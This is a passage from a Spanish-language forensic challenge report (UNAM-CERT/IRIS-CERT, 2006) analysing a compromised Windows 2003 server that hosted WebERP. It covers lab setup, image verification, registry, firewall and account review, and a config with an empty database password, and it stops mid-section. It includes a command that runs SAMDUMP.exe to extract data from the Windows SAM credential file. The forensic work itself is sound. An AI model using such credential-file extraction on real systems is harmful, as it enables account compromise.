Reto Forense

Titulo: Informe Tcnico Fecha: 21/Mar/ 2006
Reto Forense V3.0 UNAM-CERT/ IRIS CERT
Reto de Anlisis Forense V3.0 UNAM CERT / IRIS CERT
Informe Tcnico Ing.-Juan ngel Hurtado Monterrey N.L Mxico
1 INTRODUCCIN ......................................................................................................................................... 3 1.1 PRESENTACIN ......................................................................................................................................... 3 1.2 ANTECEDENTES ........................................................................................................................................ 3 2 LABORATORIO ........................................................................................................................................... 4 2.1 2.2 INSTALACIN DE LABORATORIO....................................................................................................... 4 DESCARGA Y PREPARACIN DE IMGENES. ...................................................................................... 5
3 ANLISIS FORENSE................................................................................................................................... 7 3.1 3.2 3.3 3.4 3.5 3.6 3.7 3.8 3.9 4 IDENTIFICACIN DEL SISTEMA ANALIZADO. ..................................................................................... 7 IDENTIFICACIN DE LA APLICACIN ERP. ...................................................................................... 12 COLECTANDO EVENTOS DEL SISTEMA OPERATIVO.......................................................................... 15 RECONSTRUCCIN DE LA APLICACIN ERP.................................................................................... 20 COLECTANDO EVENTOS DEL WEBERP. .......................................................................................... 23 COLECTANDO EVIDENCIA DEL FILE SYSTEM. ................................................................................. 28 FORMULANDO LA TEORA DEL ATAQUE. ......................................................................................... 35 CONSIDERACIONES SOBRE LA TEORA. ........................................................................................... 38 RECOMENDACIONES AL ADMINISTRADOR....................................................................................... 39
CONCLUSIONES................................................................................................................................. 40 4.1 4.2 4.3 RESPUESTAS A LAS PREGUNTAS PLANTEADAS POR EL RETO. .......................................................... 40 CORRESPONDENCIA CON LA ESTRUCTURA DE REPORTE SUGERIDA. ................................................ 40 AGRADECIMIENTOS. ....................................................................................................................... 40
ANEXOS ................................................................................................................................................ 41 5.1 5.2 5.3 ANEXO 1 EVENTOS RELEVANTES DE LA CUENTA JOHNATAN A PARTIR DEL INCIDENTE. ................. 41 ANEXO 2 EVENTOS RELEVANTES DE LA CUENTA VER0K. ............................................................... 43 ANEXO 3 COMO FUNCIONA EL PORT DEL EXPLOIT EN EL METASPLOIT. .......................................... 47
1 Introduccin
1.1 Presentacin
El presente documento fue elaborado en atencin a la convocatoria lanzada por UNAM-CERT/Red Iris para el tercer concurso hispano de Anlisis Forense Reto Forense Episodio III. El mismo describe desde un punto de vista tcnico el desarrollo, metodologas usadas y conclusiones a las que se llegaron a partir del anlisis forense realizado sobre la imagen proporcionada por los organizadores para este fin. La audiencia pretendida por este documento, es personal con conocimientos de sistemas y seguridad informtica. Se pretende adems que este documento sirva como referencia para aquellas personas interesadas los temas de seguridad informtica y anlisis forense computacional. La metodologa usada, descrita de una forma muy breve, consisti en la preparacin del laboratorio, identificacin del sistema a examinar, extraccin y documentacin de evidencia, relacin de hechos aislados, elaboracin de hiptesis y conclusiones a partir de la evidencia colectada. Pasemos pues al tema que nos ocupa.
1.2 Antecedentes
Este ao los organizadores nos describen la situacin bajo la cual operaba el sistema posiblemente comprometido. Transcribo:
A continuacin se describe la situacin en que operaba el sistema cuya imagen se ha proporcionado para el Reto Forense Episodio III: El administrador de sistemas de una pequea empresa ha notado que existe una cuenta que l no cre en su sistema de ERP, por lo que sospecha de algn ingreso no autorizado, del que desconoce el alcance. El sistema en que se ejecuta la aplicacin es un servidor Windows 2003, cuya principal funcin era proporcionar acceso al sistema ERP a travs de la Web. Hace poco tiempo que haban migrado al uso de este servidor. Segn el administrador, trataba de mantener el sistema actualizado por lo que no sabe cmo pudieron ingresar a su sistema. Sin embargo, tambin mencion que ms de una persona tiene acceso a cuentas privilegiadas en el sistema y acept que ocupaban a veces estas cuentas para labores no slo administrativas, sino tambin personales o para aplicaciones que no requeran ningn tipo de privilegio para ejecutarse.
En el texto se indica que el sistema operativo es un Windows 2003 (No se menciona la versin), cuya principal funcin era un proporcionar acceso a un ERP (Enterprise Resource Planning1) a travs de Web, no se mencionan datos del ERP. Se nos indica adems que tenan poco tiempo con el servidor y que mas de un usuario tenia acceso a cuentas privilegiadas en el. El administrador detecto una cuenta que el no creo en el ERP (No se indica cual cuenta), por lo que usaremos el ERP como pivote para realizar la investigacin alrededor de el. _____________________
1 Ver http://es.wikipedia.org/wiki/Sistema_de_planificaci%C3%B3n_de_recursos
2 Laboratorio
2.1 Instalacin de laboratorio.
Para elaborar el anlisis se preparo un laboratorio mismo que a continuacin se describe: Se utilizo como plataforma una Laptop Toshiba Satellite A25 con 40GB en disco duro, 250 Mb. De memoria, procesador Pentium a 2.5 GHz. y Windows XP Professional como sistema operativo de base. Se instalo una versin de prueba de VMWare Workstation Versin 5.5.12. Usando el VMWare se creo una maquina virtual de 15 Gb. De disco duro y 128 Mb en memoria, en ella se instalo el sistema operativo Knoppix Versin 3.63 el cual es una distribucin Linux basado en Debian. Se escogi esta versin de sistema operativo debido a que al instalarlo ya cuenta con libreras que permiten montar file systems NTFS, adems de que originalmente viene como Live CD con opcin a instalarse en disco duro, mas informacin acerca de esta distribucin puede ser encontrada en www.knoppix.net. Para instalarlo se inserta el Live CD y se ejecuta el knoppixinstaller. Una vez instalado el sistema operativo se instalaron las herramientas que a continuacin enumero: En el Knoppix: - sleuthkit-1.73 : El cual puede ser descargado de http://www.sleuthkit.org/ es un paquete que contiene una serie de herramientas open source que permiten colectar informacin de imgenes de sistema operativo. -autopsy-2.03: El cual puede ser descargado de http://www.sleuthkit.org/autopsy es un paquete que contiene una interfaz grafica para el uso de las herramientas de the sleuthkit adicionalmente permite gestionar el caso. - F-prot : El cual puede ser descargado de es un potente antivirus disponible para Windows y Linux (http:// www.f-prot.com). En el Windows XP: - AccessData Registry Viewer : El cual puede ser descargado de es una herramienta que permite explorar archivos de registro de Windows incluido Windows 2003 (Se utilizo una versin Demo). - IEHistoryView v1.31 : El cual puede ser descargado de http://www.nirsoft.net es una herramienta que permite explorar freeware que permite explorar archivos de historia del tipo del navegador Internet Explorer. - Xampp para Windows : El cual puede ser descargado de es un entorno de desarrollo Web que incluye el servidor web apache con php y la base de datos mysql. (http://www.apachefriends.org/en/xampp.html ) ____________________
2 Ver http://www.vmware.com 3 Ver http://www.knnoppix.net
- Visor de sucesos de Windows: Es una herramienta incluida en Windows XP y versiones superiores, con la cual es posible explorar los eventos registrados en los archivos de eventos de una maquina con Windows. - SAMDUMP.EXE: Es una herramienta que permite la extraccin de informacin del archivo SAM de WINDOWS. Puede ser encontrada en (http://www.insidepro.com/download/samdump.exe) Tambin se uso el cliente de Secure Copy WinSCP (http://winscp.net/eng/index.php ) para mover archivos entre las maquinas. Una vez dispuesto el laboratorio de trabajo procedemos con la descarga de las imgenes:
2.2
Descarga y preparacin de imgenes.
Debido al tamao de la imagen (6 GB) se opto por bajar las imgenes seccionadas de la direccin http://pgp.rediris.es:16000/reto3.0/ usando la utilera wget para ello y almacenndolos en la maquina con Knoppix, ya finalizada la descarga (Despus de largos 4 das ) disponemos de los siguientes archivos: -windows2003.img.gz.aa (Fragmento de la imagen) -windows2003.img.gz.ab (Fragmento de la imagen) -windows2003.img.gz.ac (Fragmento de la imagen) -windows2003.img.gz.ad (Fragmento de la imagen) -windows2003.img.gz.ae (Fragmento de la imagen) -windows2003.img.gz.af (Fragmento de la imagen) -windows2003.img.gz.ag (Fragmento de la imagen) -firmas-split.txt (Firmas de las imgenes) Antes de proseguir es necesario verificar la integridad de los mismos comprobando la firma md5 de cada uno, para ello utilizamos en cada archivo el comando de md5sum, este nos arrojara la firma md5 del cada uno la cual compararemos con las firmas contenidas en el archivo firmas-split.txt. #md5sum windows2003.img.gz.* c972863f5584a95f1d5ff350d972b48d b7a57c513a0ab18914f63cc927d8b4e0 42ef380cf64ddfc956dbf6acf63a174c 4fc8381404fef912ae77f61244128643 fba13b0f9cddf1a83b4d244c2987811f 4fa323705ee2064415c2854b8abef502 490e34026f2aaf91604b9e84896def16
windows2003.img.gz.aa windows2003.img.gz.ab windows2003.img.gz.ac windows2003.img.gz.ad windows2003.img.gz.ae windows2003.img.gz.af windows2003.img.gz.ag
Dado que las firmas coinciden podemos estar seguros de que no existe problema con la integridad de los archivos descargados. Ahora uniremos y descomprimiremos las imgenes para obtener la imagen completa usando los comandos cat y gunzip:
#cat windows2003.img.gz.aa windows2003.img.gz.ab windows2003.img.gz.ac windows2003.img.gz.ad windows2003.img.gz.ae windows2003.img.gz.af windows2003.img.gz.ag | gunzip > windows2003.img
Aunque no se dispone de punto de comparacin obtenemos adems la firma del archivo windows2003.img por si mas adelante requiriramos verificar su integridad. La firma es 062cf5d1ccd000e20cf4c006f2f6cce4. Creamos un directorio forense en /mnt y procedemos a montar las imgenes con el comando mount: #mount ro,loop windows2003.img /mnt/forense Como la instalacin Knoppix ya inclua drivers para NTFS no se presenta ningn problema al momento de montar la imagen, ahora podemos dirigirnos a /mnt/forense y echar un primer vistazo al contenido de la imagen (Marcamos en rojo algunos directorios interesantes):
# ls -lsa total 4 0 drwx-----4 drwxr-xr-x 0 drwx-----0 -rw------0 -rw------0 drwx-----0 -rw------0 -rw------0 -rw------0 drwx-----0 drwx-----0 drwx-----0 drwx-----0 drwx-----0 -rw------0 -rw------0 -rw------0 drwx------
1 11 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 1
root root root root root root root root root root root root root root root root root root
root 4096 Feb root 4096 Feb root 0 Feb root 0 Jan root 0 Jan root 4096 Feb root 0 Jan root 0 Jan root 47772 Mar root 4096 Feb root 0 Feb root 0 Jan root 40960 Feb root 0 Jan root 210 Jan root 295536 Mar root 234881024 Feb root 0 Jan
5 23 4 26 26 5 26 26 25 4 5 26 4 26 26 25 5 26
16:10 00:50 17:31 01:42 01:42 15:47 01:42 01:42 2005 17:45 16:10 17:13 17:30 21:00 01:26 2005 16:58 01:44
. .. ADFS AUTOEXEC.BAT CONFIG.SYS Documents and Settings IO.SYS MSDOS.SYS NTDETECT.COM Program Files RECYCLER System Volume Information WINDOWS apache boot.ini ntldr pagefile.sys wmpub
Corroboramos que la estructura de directorios corresponde a un sistema operativo Windows. Podemos ahora dar inicio al anlisis.
3 Anlisis Forense
3.1 Identificacin del sistema analizado.
En la descripcin de la situacin ya se menciona que el sistema operativo es un Windows 2003, recopilaremos informacin que nos permitir tener un panorama mas amplio de la configuracin que tenia el sistema, en los S.O. Windows 2003 (Y de hecho en la mayora de S.O. Windows basados en NT) la informacin de la configuracin se encuentra contenida en el registro de Windows. El registro de Windows4 se compone de varios archivos (system configuracin del sistema, software contiene configuracin del software instalado, SECURITY contiene la configuracin de seguridad, SAM contiene la informacin de autenticacin de los usuarios existentes, NTUSER.DAT contiene la configuracin personalizada por el usuario para el sistema y software) en formato binario y regularmente se localizan en %WINDOWSHOME/system32/config (A excepcin el archivo NTUSER.DAT se localiza en el directorio HOME de cada usuario, regularmente Documents and Settings/%USUARIO) donde %WINDOWSHOME es la ruta donde se instalo Windows. El registro se conforma por llaves y valores organizados en forma de rbol anidado, cada llave es en si un parmetro de configuracin. Nos dirigimos al directorio /mnt/forense/WINDOWS/system32/config, extraemos el contenido y lo pasamos a la maquina que tiene Windows XP5:
root@Forensic:/mnt/forense/WINDOWS/system32/config# ls AppEvent.Evt SAM.LOG SecEvent.Evt default software system DnsEvent.Evt SECURITY SysEvent.Evt default.LOG software.LOG system.LOG SAM SECURITY.LOG TempKey.LOG default.sav software.sav system.sav systemprofile userdiff userdiff.LOG
Una vez que disponemos de los archivos en nuestra maquina con Windows XP, podemos explorar los archivos de registro usando la herramienta AccessData Registry Viewer6 :
___________________
4 Una interesante descripcin del registro de Windows puede ser encontrada en http://support.microsoft.com/kb/256986 5 La transferencia de los archivos se realizo mediante secure copy, aun que se pudo haber usado cualquier otro mtodo. 6 Esta herramienta puede ser descargada de www.accessdata.com
Esta herramienta nos permitir explorar los archivos de registro en una forma similar a la que lo hace el regedit (Herramienta nativa de Windows para explorar el registro de Windows), podemos descender a travs de la estructura del registro abriendo las carpetas correspondientes y verificando los valores de las llaves que en ellas se encuentran, por ser una versin demo solo podemos ver un archivo a la vez, para cargar un archivo vamos al men File, seleccionamos Open y seleccionamos el archivo a cargar, a continuacin se muestra una vista de la herramienta:
Comenzaremos por analizar las llaves que corresponden a la rama del registro HKEY_LOCAL_MACHINE que contiene la configuracin general de la maquina y software instalado, de forma que los archivos de registro que extrajimos de la imagen proporcionada corresponden de la siguiente forma: El archivo system contiene la rama HKEY_LOCAL_MACHINE \SYSTEM El archivo software contiene la rama HKEY_LOCAL_MACHINE \SOFTWARE
Al cargar el archivo la herramienta nos posiciona en la raz de la rama. Cargamos los archivos y empezamos a navegar y buscar algunas llaves. Las siguientes llaves sern de utilidad para la identificacin del sistema (Se muestra la llave consultada, el valor contenido por la llave, la descripcin de la misma, y el archivo en el cual estaba contenida):
Llave
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName
Valor
Microsoft Windows Server 2003 R2 5.2 Service Pack 1 COUNTERS Pacific Standard Time Intel Pentium III Procesor
Descripcion
Nombre de la version de Windows Version de Windows Nivel de SP Nombre de la maquina Zona horaria configurada Nombre del Procesador
Archivo
Software
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentVersion HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion HKLM\SYSTEM\ControlSet002\Control\ComputerName\ComputerName HKLM\SYSTEM\ControlSet002\Control\TimeZoneInformation\StandarName HKLM\SYSTEMControlSet002\Enum\ACPI\GenuineIntel__x86_Family_6_Model_8\_0\DeviceDesc
Software Software System System System
HKLM = HKEY_LOCAL_MACHINE
Con esta informacin podemos ir creando el perfil del sistema, hasta el momento tenemos que la maquina era tenia instalado como sistema operativo Microsoft Windows Server 2003 R2 Build 5.2 con Service Pack 1, el nombre de la maquina era COUNTERS, tenia configurada la Zona Horaria Pacific Standard Time (Tiempo PST = GMT - 8:00), y utilizaba un procesador Intel Pentium III Procesor. Dentro de la rama HKLM\system\ControlSet002\Services\Tcpip\Parameters\Interfaces encontraremos informacin acerca de la configuracin de red que tenia la maquina. Al revisar dicha rama encontramos dos interfaces activas y configuradas de la siguiente forma: En la interfaz descrita en la llave
HKLM\system\ControlSet002\Services\Tcpip\Parameters\Interfaces\{44C3A521-98D1-4B7A-850D860BB2324A1D} encontramos el siguiente valor: Llave HKLM\system\ControlSet002\Services\Tcpip\Parameters\Interfaces\{44C3A52198D1-4B7A-850D-860BB2324A1D}\EnableDHCP HKLM = HKEY_LOCAL_MACHINE Valor
1
Descripcion
Activa DHCP el
Archivo
system
Esto nos indica que esta interfaz estaba configurada para funcionar bajo DHCP. En la interfaz descrita en la llave
system\ControlSet002\Services\Tcpip\Parameters\Interfaces\{5269ADEB-9E6D-4673-B898-4238F085972C}
encontramos los siguientes valores:

Llave HKLM\system\ControlSet002\Services\Tcpip\Parameters\Interfaces\{44C3A52198D1-4B7A-850D-860BB2324A1D}\IPAddress HKLM\system\ControlSet002\Services\Tcpip\Parameters\Interfaces\{44C3A52198D1-4B7A-850D-860BB2324A1D}\SubnetMask HKLM\system\ControlSet002\Services\Tcpip\Parameters\Interfaces\{44C3A52198D1-4B7A-850D-860BB2324A1D}\DefaultGateway HKLM\system\ControlSet002\Services\Tcpip\Parameters\Interfaces\{44C3A52198D1-4B7A-850D-860BB2324A1D}\NameServer HKLM = HKEY_LOCAL_MACHINE Valor
192.168.5.5 255.255.255.0 192.169.5.254 83.217.93.246, 67.102.133.222
Descripcion
Direccion IP asignada Mascara de subred Default Gateway DNS
Archivo
System System System System
Como podemos ver existan dos interfases activas en el equipo, una de las cuales haba sido configurada para funcionar bajo DHCP y la otra tena la siguiente configuracin: Direccin IP 192.168.5.5, Mascara 255.255.255.0, Default Gateway 192.168.5.5 con DNS 83.217.93.246 y 67.102.133.222. Suele ser comn asignar a los servidores una interfaz de red para trabajo y otra para soporte, aunque en este caso la que tiene la IP fija, que asumimos seria la de trabajo, tiene una IP privada, por lo que es posible que entre la INTERNET y la maquina existiesen mas elementos (Proxys, Servidores de NAT, etc.). Verificando los DNS mediante un WHOIS y usando Google encontramos que se tratan de DNS libres (http://www.opennic.unrated.net/public_servers.html ) se trata de DNS que se pueden utilizar cuando el proveedor de acceso no a Internet no proporciona dota al usuario de DNSs. A partir del Service Pack 2 de Windows XP, las versiones de Windows vienen equipadas con el Centro de Seguridad de Windows e incluyen un Firewall (Firewall de Windows). Ser conveniente verificar si este estaba activo y como estaba configurado, la informacin de dicha configuracin la encontramos en la rama HKLM\system\ControlSet002\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile la informacin colectada es la siguiente:
Llave
HKLM\system\ControlSet002\Services\SharedAccess\Parameters\Fire wallPolicy\StandardProfile\EnableFirewall HKLM\system\ControlSet002\Services\SharedAccess\Parameters\Fire wallPolicy\StandardProfile\DoNotAllowExceptions HKLM\system\ControlSet002\Services\SharedAccess\Parameters\Fire wallPolicy\StandardProfile\DisableNotifications HKLM\system\ControlSet002\Services\SharedAccess\Parameters\Fire wallPolicy\StandardProfile\GloballyOpenPorts\List 1
Valor
Descripcion
Firewall Habilidato
Archivo
System
Indica que las excepciones estaban permitidas Indica que las notificaciones estaban habilitadas Lista de permitidos Firewall puestos en el
System
System
HKLM\system\ControlSet002\Services\SharedAccess\Parameters\Fire wallPolicy\StandardProfile\AuthorizedApplications\List
TCP 139, TCP 445, UDP 137, UDP 138, TCP 3389, UDP 1900, TCP 2869 Apache y BitTorrent
System
Lista de excepciones (aplicaciones permitidas)
System
HKLM = HKEY_LOCAL_MACHINE
Como vemos efectivamente el Firewall de Windows se encontraba habilitado permitiendo el acceso a los puertos TCP 139, TCP 445, UDP 137, UDP 138, TCP 3389, UDP 1900, TCP 2869 que generalmente el Firewall de Windows habilita por defecto, y permitiendo adems las aplicaciones Apache y BitTorrent. Un puerto interesante es el 3389 ya que este puerto sirve para proporcionar acceso al sistema operativo de manera remota va Terminal Services (El cual es un servicio de terminal remota de 10
Windows), verificamos la llave HKLM\system\ControlSet002\Control\Terminal Server\TSEnabled y encontramos que efectivamente el Terminal Services se encontraba habilitado. Esto es importante ya que nos indica que se poda acceder al equipo de manera remota. Ahora verificaremos el nivel de parches del sistema operativo, para ello verificamos los archivos KB* en el directorio de /mnt/forense/WINDOWS:
# 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 ls -lsa KB* -rw-------rw-------rw-------rw-------rw-------rw-------rw-------rw-------rw-------rw-------rw-------rw-------rw-------rw-------rw------1 1 1 1 1 1 1 1 1 1 1 1 1 1 1 root root root root root root root root root root root root root root root root root root root root root root root root root root root root root root 15842 7111 6658 7534 15514 10694 9621 17076 14616 14477 8732 17715 12738 17340 14328 Jan Jan Jan Jan Jan Jan Jan Jan Jan Jan Jan Jan Jan Jan Jan 26 26 26 26 26 26 26 26 26 26 26 26 26 26 26 17:01 16:53 16:54 16:54 17:01 16:55 16:56 17:02 17:00 17:00 16:58 16:59 16:59 17:02 16:59 KB890046.log KB896358.log KB896422.log KB896424.log KB896428.log KB896688.log KB896727.log KB899587.log KB899589.log KB901017.log KB901214.log KB902400.log KB903235.log KB905414.log KB908519.log
El nombre del archivo nos indica el nombre del parche instalado, podemos encontrar informacin detallada de cada parche en la base de conocimientos de Microsoft o en la Microsoft TechNet (http://www.microsoft.com/technet/security/default.mspx ) buscando el nombre del archivo sin la extensin .log. Finalmente entre los archivos que extrajimos de la maquina se encuentra el archivo SAM, el cual tambin forma parte del registro de Windows y contiene la informacin referente a los usuarios dados de alta en el sistema, utilizamos la herramienta SAMDUMP.exe para extraer la informacin contenida en el archivo SAM. El comando a usar es copiamos el archivo SAM al mismo directorio donde tenemos la herramienta y ejecutamos SAMDUMP.exe SAM > SAMDUMPED.txt, despus de ello nos queda en el archivo SAMDUMPED.txt informacin de los usuarios la cual exponemos a continuacin:
Usuario
Administrator Guest SUPPORT_388945a0 Johnatan ernesto amado maick lalo moni maru mirna katy caracheo
ID
Descripcion
500 Built-in account for administering the computer/domain 501 Built-in account for guest access to the computer/domain CN=Microsoft Corporation,L=Redmond,S=Washington,C=US,This is a vendor's 1001 account for the Help and Support Service 1006 Johnatan Tezcatlipoca 1007 Ernesto Snchez 1008 Amado Carrillo 1009 Gabriel Torres 1010 Eduardo Hernndez 1011 Monica Islas 1012 Maria Guadalupe Ramos 1013 Mirna Casillas 1014 Katalina Rodriguez 1015 Jorge Caracheo Mota
11

ovejas reno pili zamorano mpenelope postgres ver0k 1016 Eduardo Roldn 1017 Israel Robledo Gonzles 1018 Elizabet Herrera Zamora 1019 Rolando Zamorategui 1020 Mari Carmen Penelope
1023 postgres,PostgreSQL service account 1024
Expusimos los nombres de usuarios, los identificadores y su descripcin. Marcamos en rojo la cuenta ver0k ID 1024 debido a que es la nica que no cuenta con descripcin (En todas las dems aparece el nombre del usuario o del servicio).
3.2
Identificacin de la aplicacin ERP.
Ahora buscaremos informacin acerca de la aplicacin ERP que exista en la maquina, cuando dimos ese primer vistazo marcamos un directorio llamado apache (/mnt/forense/apache o c:\apache en la maquina original), el cual parece un buen punto de partida. As que comenzamos a explorarlo y encontramos esta estructura de directorio:
mnt/forense/apache/Apache# ls -l -rw------- 1 root root 15062 Nov -rw------- 1 root root 20545 Oct -rw------- 1 root root 335941 Oct -rw------- 1 root root 20768 Dec -rw------- 1 root root 766 Dec -rw------- 1 root root 4203 Nov -rw------- 1 root root 1343 Nov -rw------- 1 root root 20560 Oct drwx------ 1 root root 4096 Jan drwx------ 1 root root 0 Jan drwx------ 1 root root 4096 Jan drwx------ 1 root root 12288 Jan drwx------ 1 root root 40960 Jan drwx------ 1 root root 8192 Jan drwx------ 1 root root 0 Jan drwx------ 1 root root 4096 Jan drwx------ 1 root root 0 Feb drwx------ 1 root root 4096 Jan drwx------ 1 root root 4096 Feb drwx------ 1 root root 4096 Jan drwx------ 1 root root 0 Jan -rw------- 1 root root 36946 Oct -rw------- 1 root root 73808 Oct 24 18 18 6 6 24 24 18 26 26 26 26 26 26 26 26 5 26 3 26 26 18 18 2004 15:11 15:11 2004 2004 2004 2004 15:11 21:00 21:00 21:00 21:48 21:00 21:00 21:00 21:00 18:44 21:00 22:50 21:04 21:00 15:16 15:16 ABOUT_APACHE.TXT Apache.exe ApacheCore.dll LICENSE.TXT NOTICE.TXT README-WIN.TXT WARNING-WIN.TXT Win9xConHook.dll bin cgi-bin conf htdocs icons include lib libexec logs modules mysql php proxy xmlparse.dll xmltok.dll.
La estructura corresponde a la instalacin del popular WebServer Open Source Apache, resaltan las carpetas PHP (Lenguaje Open Source de scripting para Web) y la popular base de datos Open Source MySQL. En el registro de Windows podremos encontrar informacin de estas y otras aplicaciones instaladas, dentro de la rama \HKEY_LOCAL_MACHINE\SOFTWARE, destacan las siguientes llaves:
12
Llave
HKLM\software\Apache Group\Apache\1.3.34
Valor
Descripcion
El Apache instalado era la versin 1.3.34 La version de MySQL era 4.1 Se tenia instalado la versin 1.1 de MySQL Administrator
Archivo
Software
HKLM\software\MySQL AB\MySQL Server 4.1
Software
HKLM\software\MySQL AB\MySQL Administrator 1.1
Software
HKLM\software\PostgreSQL\Installations\{34D95765-2D5A-470F-A39FBC9DEAAAF04F}\Version HKLM\software\Mozilla\Mozilla Firefox 1.5.0.1
8.1
Se encontr instalad la versin 8.1 de PostgreeSQL Se tenia instalada la version 1.5.0.1 del navegador Open Source FireFox
Software
Software
* HKLM = HKEY_LOCAL_MACHINE
Tenemos pues un entorno Web WAMP (Windows Apache MySQLPHP), con Apache 1.3.34, MySQL 4.1 y PHP. Verificamos el archivo conf/httpd.conf dentro del directorio de apache (/mnt/forense/apache/Apache o c:\apache\Apache en la maquina original) y descubrimos que el servidor responda peticiones a travs del puerto 80. Veamos ahora dentro del directorio htdocs en el directorio de apache para ver el contenido del mismo, ahi encontramos los archivos que conforman el manual del Apache aun instalados y la carpeta weberp, en esa carpeta encontramos la aplicacin WebERP (http://www.weberp.org) , la cual es una aplicacin de ERP Open Source escrita en PHP y elaborada por Logic Works Ltd esta permite administrar los recursos de una empresa, parece que encontramos la aplicacin que buscbamos (Recordemos que la investigacin gira en torno a una cuenta extraa encontrada en el ERP), podemos encontrar documentacin de la aplicacin en http://www.weberp.org/SystemInformation.php . La configuracin de esta aplicacin reside en el archivo config.php que se encuentra en ese mismo directorio, revisando este archivo encontramos lo siguiente (Comentarios en rojo):
// webERP version $Version = '3.04'; La version del WEBERP es 3.04 . . $dbType = 'mysql'; La base datos usada era mysql //$dbType = 'postgres'; //$dbType = 'mysql'; $DatabaseName='weberp'; El nombre de la base de datos es weberp // sql user & password $dbuser = 'weberp_us'; La base de datos era accesible con el usuario weberp_us sin necesidad de password $dbpassword = ''; // which encryption function should be used //$CryptFunction = "md5"; // MD5 Hash $CryptFunction = "sha1"; // SHA1 Hash Se utilizaba encriptacin sha1
13
En este punto detectamos una grave falla de seguridad al dejar el acceso a la base de datos sin password. Como vimos que la base de datos usada para la aplicacin es MySQL veamos ahora el directorio de dicha aplicacin (/mnt/forense/apache/Apache/mysql o c:\apache\Apache\mysql en la maquina original). En el encontramos la tpica estructura de archivos de esta base de datos, centrmonos en el directorio data, que es el que es donde se depositan las bases de datos:
mnt/forense/apache/Apache/mysql/data# ls -lrt total 0 drwx------ 1 root root 0 Jan 26 21:39 -rw------- 1 root root 10485760 Jan 26 21:42 drwx------ 1 root root 16384 Jan 26 21:53 -rw------- 1 root root 22 Feb 3 22:57 drwx------ 1 root root 40960 Feb 5 10:04 -rw------- 1 root root 149898 Feb 5 17:19 -rw------- 1 root root 1087092 Feb 5 17:20 -rw------- 1 root root 10485760 Feb 5 18:44 -rw------- 1 root root 18874368 Feb 5 18:44 -rw------- 1 root root 3432 Feb 5 18:44
test ib_logfile1 mysql counters-bin.index weberp counters-bin.000001 counters.log ib_logfile0 ibdata1 counters.err
En este directorio encontramos 3 bases de datos (Cada carpeta dentro de data almacena una base de datos), la base de datos mysql que almacena la informacin de la configuracin del gestor, la base de datos test que se crea al instalar MySQL, la base de datos weberp que debe ser en la que soportaba el WebERP. Notamos adems la existencia de los archivos ib_logfile1, countersbin.index, counters-bin.000001, counters.log, ib_logfile0, los cuales nos indican que la informacin era almacenada usando el motor InnoDB, esto lo corroboramos al leer el archivo weberp-new.sql localizado en el directorio sql/mysql en el path del WebERP (/mnt/forense/apache/Apache/htdocs/web-erp o c:\apache\Apache\mysql\htdocs\web-erp en la maquina original), el script weberpnew.sql sirve para crear la base de datos al momento de instalar la aplicacin WebERP, ahi se puede ver que todas las tablas se crean como InnoDB (Tienen el modificador TYPE=InnoDB en la sentencia SQL de creacin), MySQL dispone de 2 motores principales, InnoDB y MyISAM, y almacena la informacin de forma distinta dependiendo del motor que se use (Puede encontrar mas informacin sobre MySQL en www.mysql.com). Resumiendo este punto la aplicacin ERP usada es WebERP 3.04, la cual esta escrita en PHP, corra sobre un servidor Web Apache 1.3.34 con soporte para PHP 4.4.2 y se apoyaba en una base de datos MySQL 4.1.16 usando el motor InnoDB de la misma (Mas adelante se indica como se obtuvieron las versiones exactas de PHP y MySQL). Ahora que disponemos de mucha mas informacin sobre el servidor y la aplicacin que en el resida, pasemos a colectar sucesos y evidencia de la maquina.
14
3.3
Colectando eventos del sistema operativo.
Vamos ahora colectar informacin de los eventos que ocurrieron en la maquina, comenzaremos colectando la informacin de eventos a nivel del sistema operativo y despus lo haremos con la aplicacin WebERP. A nivel sistema operativo Windows almacena informacin de los eventos que suceden en el (Tanto de aplicaciones como del mismo S.O.) en los archivos de registro Evt (Los mismos que se encuentran en (/mnt/forense/WINDOWS/system32/config o C:\WINDOWS\system32\config en la maquina original).
/mnt/forense/WINDOWS/system32/config# ls -l *.Evt -rw------- 1 root root 65536 Feb 5 18:44 AppEvent.Evt -rw------- 1 root root 65536 Feb 5 18:44 DnsEvent.Evt -rw------- 1 root root 4849664 Feb 5 18:44 SecEvent.Evt -rw------- 1 root root 131072 Feb 5 18:44 SysEvent.Evt
Dichos archivos se relacionan de la siguiente forma: SysEvent.Evt Contiene informacin de los eventos del sistema. AppEvent.Evt Contiene informacin de los eventos de las aplicaciones. SecEvent.Evt Contienen informacin de los eventos ligados a la seguridad del sistema.
Adicionalmente se encontr entre ellos un archivo DnsEvent.Evt que suponemos contiene informacin del servicio de Servidor DNS de Windows. Como ya tenemos estos archivos en nuestra maquina con Windows (Los extrajimos con toda la carpeta Config) podemos comenzar a analizarlos, para ellos usamos el Visor de sucesos de Windows, el cual es una herramienta diseada por Microsoft para este fin. Esta herramienta se encuentra en las Herramientas Administrativas dentro del panel de control de Windows.
15
Al abrir la herramienta se cargan los sucesos correspondientes a nuestro equipo de laboratorio, para cargar los archivos que extrajimos para analizar vamos al men Accin , seleccionamos la opcin Abrir archivos de registro, hay que especificar el tipo de registro del que se trata (Sistema, Aplicacin o Seguridad) tomamos el archivo y listo.
Una vez cargado el archivo, se despliegan los sucesos registrados. En la lista podemos ver el tipo de evento, fecha y hora (Una observacin es que la hora corresponde a tiempo GMT -6Hrs para traducirlo al tiempo original de la maquina (PST) que analizamos habr que restarle 2 Hrs mas), quien lo origino, el identificador del evento y el ID del usuario (Del ID las ultimas cifras las podemos relacionar directamente con la tablas de usuarios que anteriormente obtuvimos para saber exactamente el usuario del que se trata, as por ejemplo tenemos el ID S-1-5-21-2780117151-1340924567-2512508698-500, buscamos el 500 en la tabla de usuarios y sabemos que se trata de la cuenta Administrador).
16
Para el registro de sistema tenemos informacin desde el 25 de Enero hasta el 05 de Febrero del 2006. Para ver la descripcin de un suceso basta dar doble clic sobre el, as podemos ir revisando la historia contenida en los registros. A continuacin se muestran dos eventos de ejemplo, en este caso se trata de los eventos que se generaron al instalar PHP y MySQL (De ah se obtuvo la versin exacta de las aplicaciones.
